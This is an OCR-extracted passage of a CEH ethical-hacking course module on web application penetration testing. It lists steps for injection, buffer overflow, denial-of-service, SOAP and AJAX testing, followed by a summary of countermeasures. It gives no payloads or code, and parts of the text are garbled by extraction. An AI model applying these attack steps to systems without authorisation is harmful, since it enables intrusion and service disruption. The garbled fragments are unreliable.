P e r f o r m SSI i n j e c t i o n t e s t i n g a n d f i n d if t h e w e b s e r v e r a c t u a l l y s u p p o r t s SSI d i r e c t i v e s u s i n g
t o o l s s u c h a s W e b P r o x y B u r p S u i t e , P a r o s , W e b S c a r a b , S t r i n g s e a r c h e r : g r e p . If t h e a t t a c k e r c a n
i n j e c t SSI i m p l e m e n t a t i o n s , t h e n h e o r s h e c a n s e t o r p r i n t w e b s e r v e r CGI e n v i r o n m e n t
v a r i a b l e s .
S t e p 10 : P e r f o r m X P a t h i n j e c t i o n t e s t i n g
I n j e c t X P a t h c o d e a n d i n t e r f e r e w i t h t h e q u e r y r e s u l t . X P a t h i n j e c t i o n a l l o w s t h e a t t a c k e r t o
a c c e s s c o n f i d e n t i a l i n f o r m a t i o n .

S t e p 11 : P e r f o r m I M A P / S M T P i n j e c t i o n t e s t i n g
P e r f o r m I M A P / S M T P i n j e c t i o n t e s t i n g t o i d e n t i f y v u l n e r a b l e p a r a m e t e r s . U n d e r s t a n d t h e d a t a
f l o w a n d d e p l o y m e n t s t r u c t u r e o f t h e c l i e n t , a n d p e r f o r m I M A P / S M T P c o m m a n d i n j e c t i o n .
M a l i c i o u s I M A P / S M T P c o m m a n d s a l l o w a t t a c k e r s t o a c c e s s t h e b a c k e n d m a i l s e r v e r .

D a ta V alid atio n Testing
( C o n t ’d )
CEH
Inject code (a m alicious URL) and perform
source code analysis to discover code
injection vulnerabilities
Perform manual code analysis and craft
m alicious HTTP requests using | to test fo r
OS com m and injection attacks
Perform manual and autom ated code
analysis using tools such as OllyDbg to
detect buffer overflow condition
Upload a file th a t exploits a com ponent in
the local user w o rkstation, when viewed or
dow nloaded by the user, perform XSS, and
SQL injection attack
Id e n tify all user controlled in put that
influences one or m ore headers in the
response, and check w hether he or she can
successfully inject a CR+LF sequence in it
Input valid a tio n
erro rs
■‫<״‬
P erform OS . . . y Local d ata and
com m anding system in fo rm a tio n
y
P erform b u ffe r
Stack and heap m em ory
o v e rflo w te s tin g
^ in fo rm a tio n , a pp lica tion
c o n tro l flo w
y
P erform incubated
Server co n fig u ra tio n
v u ln e ra b ility te stin g
' and input valid a tio n
schemes
y
Test fo r HTTP ...-y Cookies, and HTTP
sp littin g /sm u g g lin g redirect in fo rm a tio n
D a t a V a l i d a t i o n T e s t i n g ( C o n t ’ d )
S t e p 1 2 : P e r f o r m c o d e i n j e c t i o n t e s t i n g‫י‬
T o p e r f o r m c o d e i n j e c t i o n t e s t i n g , i n j e c t c o d e (a m a l i c i o u s URL) a n d p e r f o r m s o u r c e c o d e
a n a l y s i s t o d i s c o v e r c o d e i n j e c t i o n v u l n e r a b i l i t i e s . It g i v e s i n f o r m a t i o n a b o u t i n p u t v a l i d a t i o n
e r r o r s .
S t e p 13 : P e r f o r m O S c o m m a n d i n g
P e r f o r m m a n u a l c o d e a n a l y s i s a n d c r a f t m a l i c i o u s HTTP r e q u e s t s u s i n g | t o t e s t f o r OS
c o m m a n d i n j e c t i o n a t t a c k s . O S c o m m a n d i n g m a y r e v e a l local d a t a a n d s y s t e m i n f o r m a t i o n .
S t e p 14 : P e r f o r m b u f f e r o v e r f l o w t e s t i n g
P e r f o r m m a n u a l a n d a u t o m a t e d c o d e a n a l y s i s u s i n g t o o l s s u c h a s O lly D b g t o d e t e c t b u f f e r
o v e r f l o w c o n d i t i o n . T his m a y h e l p y o u t o d e t e r m i n e s t a c k a n d h e a p m e m o r y i n f o r m a t i o n a n d
a p p l i c a t i o n c o n t r o l f l o w .
S t e p 15 : P e r f o r m i n c u b a t e d v u l n e r a b i l i t y t e s t i n g
U p l o a d a file t h a t e x p l o i t s a c o m p o n e n t in t h e local u s e r w o r k s t a t i o n , w h e n v i e w e d o r
d o w n l o a d e d b y t h e u s e r , p e r f o r m XSS, a n d SQL i n j e c t i o n a t t a c k s . I n c u b a t e d v u l n e r a b i l i t i e s m a y
g i v e i n f o r m a t i o n a b o u t s e r v e r c o n f i g u r a t i o n a n d i n p u t v a l i d a t i o n s c h e m e s t o t h e a t t a c k e r s .

S t e p 16 : T e s t f o r H TT P s p l i t t i n g / s m u g g l i n g
I d e n t i f y all u s e r - c o n t r o l l e d i n p u t t h a t i n f l u e n c e s o n e o r m o r e h e a d e r s in t h e r e s p o n s e a n d c h e c k
w h e t h e r h e o r s h e c a n s u c c e s s f u l l y i n j e c t a CR+LF s e q u e n c e in it. A t t a c k e r s p e r f o r m HTTP
s p l i t t i n g / s m u g g l i n g t o g e t c o o k i e s a n d HTTP r e d i r e c t i n f o r m a t i o n .

CEHD e n i a l ‫־‬ o f ‫־‬ S e r v i c e T e s t i n g
d Craft a query th a t w ill not return a result and
includes several wildcards. Test m anually or
em ploy a fuzzer to autom ate th e process
6 Test th a t an account does indeed lock after a
certain num ber of failed logins. Find places
w here the application discloses th e difference
between valid and invalid logins
Perform a manual source code analysis and
subm it a range o f inputs w ith varying lengths
to the application
Find where the numbers subm itted as a
nam e/value pair m ight be used by the
application code and atte m p t to set the value
to an extremely large num eric value, then see
if th e server continues to respond
A p plication
in fo rm a tio n
Login accou nt
in fo rm a tio n
Test fo r locking
custom er accounts
B u ffe r o v e rflo w
points
M axim um num ber o f
■> objects th a t a p p lica tion
can handle
Test fo r b u ffe r
o verflo w s
Test fo r user specified
obje ct allocation
I
D e n i a l ‫־‬ o f ‫־‬ S e r v i c e T e s t i n g
T o c h e c k y o u r w e b a p p l i c a t i o n a g a i n s t D oS a t t a c k s , f o l l o w t h e s e s t e p s :
S t e p l : T e s t f o r SQL w i l d c a r d a t t a c k s
C r a f t a q u e r y t h a t will n o t r e t u r n a r e s u l t a n d i n c l u d e s s e v e r a l w i l d c a r d s . T e s t m a n u a l l y o r
e m p l o y a f u z z e r t o a u t o m a t e t h e p r o c e s s .
S t e p 2 : T e s t f o r l o c k i n g c u s t o m e r a c c o u n t s
T e s t t h a t a n a c c o u n t d o e s i n d e e d lo ck a f t e r a c e r t a i n n u m b e r o f f a i l e d lo g in s. Fin d p l a c e s w h e r e
t h e a p p l i c a t i o n d i s c l o s e s t h e d i f f e r e n c e b e t w e e n v alid a n d in valid lo g in s. If y o u r w e b a p p l i c a t i o n
d o e s n ' t lo ck c u s t o m e r a c c o u n t s a f t e r a c e r t a i n n u m b e r o f f a i l e d lo g in s, t h e n t h e r e is a
p o s s i b i l i t y f o r t h e a t t a c k e r t o c r a c k c u s t o m e r p a s s w o r d s b y e m p l o y i n g b r u t e f o r c e a t t a c k s ,
d i c t i o n a r y a t t a c k s , e t c .
S t e p 3 : T e s t f o r b u f f e r o v e r f l o w s
P e r f o r m a m a n u a l s o u r c e c o d e a n a l y s i s a n d s u b m i t a r a n g e o f i n p u t s w i t h v a r y i n g l e n g t h s t o t h e
a p p l i c a t i o n t o t e s t f o r b u f f e r o v e r f l o w s .
S t e p 4 : T e s t f o r u s e r s p e c i f i e d o b j e c t a l l o c a t i o n
Fin d w h e r e t h e n u m b e r s s u b m i t t e d a s a n a m e / v a l u e p a i r m i g h t b e u s e d b y t h e a p p l i c a t i o n c o d e
a n d a t t e m p t t o s e t t h e v a l u e t o a n e x t r e m e l y l a r g e n u m e r i c v a l u e , a n d t h e n s e e if t h e s e r v e r

c o n t i n u e s t o r e s p o n d . If t h e a t t a c k e r k n o w s t h e m a x i m u m n u m b e r o f o b j e c t s t h a t t h e
a p p l i c a t i o n c a n h a n d l e , h e o r s h e c a n e x p l o i t t h e a p p l i c a t i o n b y s e n d i n g o b j e c t s b e y o n d
m a x i m u m limit.
Ethical Hacking and C ounterm easures Exam 312-50 Certified Ethical Hacker

CEH
-
D e n i a l ‫־‬ o f ‫־‬ S e r v i c e T e s t i n g
( C o n t ’d )
© Enter an extremely large num ber in
the input field that is used by
application as a loop counter
© Use a script to autom atically submit
an extremely long value to the server
in the request that is being logged
© Identify and send a large number o f
requests that perform database
operations and observe any
slowdown or new error messages
© Create a script to autom ate the
creation o f many new sessions w ith
the server and run the request that is
suspected o f caching the data within
the session fo r each one
Logical errors in an
application
W rite user provided w. Local,‫•״‬
data to disk disks exhaustion
‫►־‬ Program m ing flaws
Session managem ent
errors
Test fo r proper
release o f resources
V
Test fo r storing too
much data in session
D e n i a l ‫־‬ o f ‫־‬ S e r v i c e T e s t i n g ( C o n t ’ d )
S t e p 5 : T e s t f o r u s e r i n p u t a s a l o o p c o u n t e r
T e s t f o r u s e r i n p u t a s a l o o p c o u n t e r a n d e n t e r a n e x t r e m e l y l a r g e n u m b e r in t h e i n p u t field t h a t
is u s e d b y a p p l i c a t i o n a s a l o o p c o u n t e r . If t h e a p p l i c a t i o n fails t o e x h i b i t its p r e d e f i n e d m a n n e r ,
it m e a n s t h a t a p p l i c a t i o n c o n t a i n s a lo gical e r r o r .
S t e p 6 : W r i t e u s e r p r o v i d e d d a t a t o d i s k
U s e a s c r i p t t o a u t o m a t i c a l l y s u b m i t a n e x t r e m e l y l o n g v a l u e t o t h e s e r v e r in t h e r e q u e s t t h a t is
b e i n g l o g g e d .
S t e p 7 : T e s t f o r p r o p e r r e l e a s e o f r e s o u r c e s
I d e n t i f y a n d s e n d a l a r g e n u m b e r o f r e q u e s t s t h a t p e r f o r m d a t a b a s e o p e r a t i o n s a n d o b s e r v e
a n y s l o w d o w n o r n e w e r r o r m e s s a g e s .
S t e p 8 : T e s t f o r s t o r i n g t o o m u c h d a t a in s e s s i o n
C r e a t e a s c r i p t t o a u t o m a t e t h e c r e a t i o n o f m a n y n e w s e s s i o n s w i t h t h e s e r v e r a n d r u n t h e
r e q u e s t t h a t is s u s p e c t e d o f c a c h i n g t h e d a t a w i t h i n t h e s e s s i o n f o r e a c h o n e .

CEHWeb Services Testing
w To gather WS information use tools such as wsCh ess, Soaplite, CURL, Peri, etc.
and online tools such as UDDI Browser, WSIndex, and Xmethods
» Use tools such as WSDigger, WebScarab, and Found stone to automate web
services security testing
« Pass malformed SOAP messages to XML parser or attach a very large string to
the message. Use WSdigger to perform automated XML structure testing
e Use web application vulnerability scanners such as WebScarab to test XML
content-level vulnerabilities
« Pass malicious content on the HTTP GET strings that invoke XML applications
» Craft an XML document (SOAP message) to send to a web service that contains
malware as an attachment to check if XML document has SOAP attachment
vulnerability
» Attempt to resend a sniffed XML message using Wireshark and WebScarab
In fo rm a tio n a b o u t
M IT M v u ln e ra b ility
SOAP m e ssa ge
in fo r m a tio n
In fo rm a tio n a b o u t SQL,
XPath, b u ffe r o v e rflo w ,
and c o m m a n d in je c tio n
v u ln e ra b ilitie s
HTTP GET/REST
a tta c k v e c to rs
W e b S e r v i c e s T e s t i n g
Stepl: Gather WS information
Gather WS information using tools such as Net Square wsChess, Soaplite, CURL, Perl, etc. and
online tools such as UDDI Browser, WSIndex, and Xmethods.
Step 2: Test WSDL
Test WSDL to determine various entry points of WSDL. You can automate web services security
testing using tools such as WSDigger, WebScarab, and Foundstone.
Step 3: Test XML structural
Pass malformed SOAP messages to the XML parser or attach a very large string to the message.
Use WSdigger to perform automated XML structure testing.
Step 4: Test XML content-level
Use web application vulnerability scanners such as WebScarab to test XML content-level
vulnerabilities.
Step 5: Test HTTP GET parameters/REST
Pass malicious content on the HTTP GET strings that invoke XML applications.
Module 13 Page 1982

Step6: Test naughty SOAP attachments
Craft an XML document (SOAP message) to send to a web service that contains malware as an
attachment to check if XML document has SOAP attachment vulnerability.
Step 7: Perform replay testing
Attempt to resend a sniffed XML message using Wireshark and WebScarab. This test gives
information about MITM vulnerability.
Module 13 Page 1983

CEHAJAX Testing
AJAX a p p lic a tio n ca ll
e n d p o in ts
X M L H ttp R e q u e s t o b je c t,
Ja va S crip t file s , AJAX
fra m e w o rk s
y
P a rs e t h e H T M L a n d
J a v a S c rip t file s
U se a p r o x y t o ................. v F o rm a t o f a p p lic a tio n
o b s e rv e t r a f f ic re q u e s ts
8 E n u m e ra te th e A JA X c a ll e n d p o in ts f o r th e a s y n c h ro n o u s c a lls u s in g to o ls s u c h as S p ra ja x
‫ט‬ O b s e rv e H T M L a n d J a v a S c rip t file s t o fin d U R Ls o f a d d itio n a l a p p lic a tio n s u rfa c e e x p o s u re
© U s e p r o x ie s a n d s n iffe r s t o o b s e rv e t r a ff ic g e n e r a te d b y u s e r -v ie w a b le p a g e s a n d th e b a c k g ro u n d a s y n c h ro n o u s
t r a ff ic t o th e A JA X e n d p o in ts in o r d e r t o d e te rm in e th e f o r m a t a n d d e s tin a tio n o f th e re q u e s ts
A J A X T e s t i n g
The following are the steps used to carry out AJAX pen testing:
Step 1: Test for AJAX
Enumerate the AJAX call endpoints for the asynchronous calls using tools such as Sprajax.
Step 2: Parse the HTML and JavaScript files
Observe HTML and JavaScript files to find URLs of additional application surface exposure.
Step 3: Use a proxy to observe traffic
Use proxies and sniffers to observe traffic generated by user-viewable pages and the
background asynchronous traffic to the AJAX endpoints in order to determine the format and
destination of the requests.
Module 13 Page 1984

Module Summary CEHUrtiffetf itkNjI lUilwt
O rg a n iza tio n s to d a y re ly h e a vily o n w e b a p p lic a tio n s a nd W e b 2 .0 te c h n o lo g ie s
to s u p p o rt key business processes a nd im p ro v e p e rfo rm a n c e
W ith in cre a sin g d e p e n d e n ce , w e b a p p lic a tio n s a nd w e b services are in cre a sin g ly b ein g ta rg e te d
by va rio u s a tta c k s th a t re su lts in h ug e re ve n u e loss fo r th e o rg a n iz a tio n s
S o m e o f th e m a jo r w e b a p p lic a tio n v u ln e ra b ilitie s in c lu d e in je c tio n fla w s, cro ss-site s c rip tin g
(XSS), SQL in je c tio n , s e c u rity m is c o n fig u ra tio n , b ro ke n session m a n a g e m e n t, etc.
In p u t v a lid a tio n fla w s are a m a jo r co n ce rn as a tta cke rs can e x p lo it th e se fla w s to p e rfo rm o r
c re a te a base fo r m o s t o f th e w e b a p p lic a tio n a tta cks, in c lu d in g cro ss-site s c rip tin g , b u ffe r
o v e rflo w , in je c tio n a tta cks, etc.
It is also o bse rve d th a t m o s t o f th e v u ln e ra b ilitie s re s u lt because o f m is c o n fig u ra tio n a nd n o t
fo llo w in g s ta n d a rd s e c u rity p ra ctice s
C o m m o n c o u n te rm e a s u re s fo r w e b a p p lic a tio n s e c u rity in c lu d e secure a p p lic a tio n
d e v e lo p m e n t, in p u t v a lid a tio n , c re a tin g a nd fo llo w in g s e c u rity b est p ra ctice s, u sin g W AF
F ire w a ll/ID S a nd p e rfo rm in g re g u la r a u d itin g o f n e tw o rk using w e b a p p lic a tio n s e c u rity to o ls
-----------
M o d u l e S u m m a r y
© Organizations today rely heavily on web applications and Web 2.0
technologies
to support key business processes and improve performance.
With increasing dependence, web applications and web services are increasingly being
targeted by various attacks that results in huge revenue loss for the organizations.
Some of the major web application vulnerabilities include injection flaws, cross-site
scripting (XSS), SQL injection, security misconfiguration, broken session management,
etc.
Input validation flaws are a major concern as attackers can exploit these flaws to
perform or create a base for most of the web application attacks, including cross-site
scripting, buffer overflow, injection attacks, etc.
It is also observed that most of the vulnerabilities result because of misconfiguration
and not following standard security practices.
Common countermeasures for web application security include secure application
development, input validation, creating and following security best practices, using WAF
firewall/IDS, and performing regular auditing of network using web application security
tools.
©
e
©
e
©
Module 13 Page 1985

Hacking web applications CEHv8 module 13

More Related Content

What's hot (20)

Viewers also liked (20)

Similar to Hacking web applications CEHv8 module 13 (20)

Recently uploaded (20)

Hacking web applications CEHv8 module 13